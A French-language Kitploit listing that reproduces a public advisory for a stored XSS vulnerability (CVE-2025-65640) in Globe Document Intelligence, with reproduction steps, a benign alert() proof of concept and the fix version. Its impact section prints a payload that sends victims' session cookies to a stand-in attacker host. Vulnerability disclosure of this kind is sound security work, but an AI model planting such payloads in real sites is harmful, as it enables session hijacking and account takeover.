Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-65640 — Avis public pour CVE-2025-65640 : vulnérabilité XSS stockée dans Globe Document Intelligence. | Kitploit
Outils/GitHubGitHub/vincenzo-emanuele/cve-2025-65640
Analyse des VulnérabilitésExploitation d'Applications WebSécurité WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubvincenzo-emanuele/cve-2025-65640

CVE-2025-65640

Avis public pour CVE-2025-65640 : vulnérabilité XSS stockée dans Globe Document Intelligence.

Voir le dépôt
101il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-65640

1. Informations sur la vulnérabilité

  • ID CVE : CVE-2025-65640 (actuellement RÉSERVÉ)
  • Type de vulnérabilité : Cross-Site Scripting stocké (XSS)
  • Score CVSSv3 : 6.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)
  • Fournisseur : Arket/Bluenext S.r.l.
  • Produit : Globe Document Intelligence
  • Version affectée : 5.0.0.559
  • Découvreur : Vincenzo Emanuele Martone

2. Description

Une vulnérabilité de Cross-Site Scripting stocké (XSS) a été identifiée dans la plateforme Globe Document Intelligence (version 5.0.0.559). L'application ne parvient pas à assainir ou encoder correctement les entrées fournies par l'utilisateur dans la propriété « Titre » d'un document nouvellement créé. Lorsqu'un utilisateur authentifié accède aux pages de résumé (par exemple, « Tâche en cours / Récent »), la charge utile malveillante est reflétée et exécutée dans le contexte du navigateur de la victime.

3. Impact

Cette vulnérabilité permet à un attaquant authentifié de stocker du code JavaScript malveillant sur le serveur. Lorsque d'autres utilisateurs authentifiés (y compris les comptes administratifs) consultent les pages concernées, le script s'exécute automatiquement. Bien que la preuve de concept ci-dessous démontre la vulnérabilité en utilisant un alert() bénin, un attaquant peut exploiter cette faille pour réaliser un détournement de session et une prise de contrôle de compte. Par exemple, l'injection d'une charge utile telle que exfiltrerait silencieusement les cookies de session de la victime vers un serveur externe contrôlé par l'attaquant.

<script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script>

4. Étapes pour reproduire (Preuve de concept)

Pour reproduire la vulnérabilité, un attaquant authentifié peut suivre ces étapes :

  1. Accédez à la section de création de document (« Nuovo documento ») et remplissez les champs obligatoires avec des données arbitraires pour créer avec succès un nouveau document.
  2. Soumettez le formulaire et créez le document.
  3. Sélectionnez le document nouvellement créé, ouvrez le menu contextuel (clic droit -> Propriétés du document) et localisez le champ « Titre ».
  4. Injectez la charge utile XSS de base suivante dans le champ « Titre » : <script>alert("XSS")</script>
  5. Enregistrez les modifications. La charge utile malveillante est désormais stockée de manière persistante dans la base de données.
  6. Accédez à la page « Tâche en cours / Récent » (Task in attesa/Recenti).
  7. Comme la page affiche le titre du document sans un encodage de sortie approprié, la charge utile JavaScript est exécutée, déclenchant l'alerte.

5. Atténuation recommandée

Selon le fournisseur, cette vulnérabilité a été corrigée dans la version 5.1.0.575. Pour remédier à ce problème, il est recommandé de mettre à jour la plateforme Globe Document Intelligence vers la version 5.1.0.575.


Avertissement

Cette preuve de concept (PoC) est fournie exclusivement à des fins éducatives et de recherche. Les informations et le code décrits dans ce document ne doivent pas être utilisés pour des activités malveillantes ou contre des systèmes sans autorisation explicite et préalable des propriétaires du système. L'auteur décline toute responsabilité et n'est pas responsable de tout abus ou dommage causé par l'application du matériel fourni.

Télécharger l’outil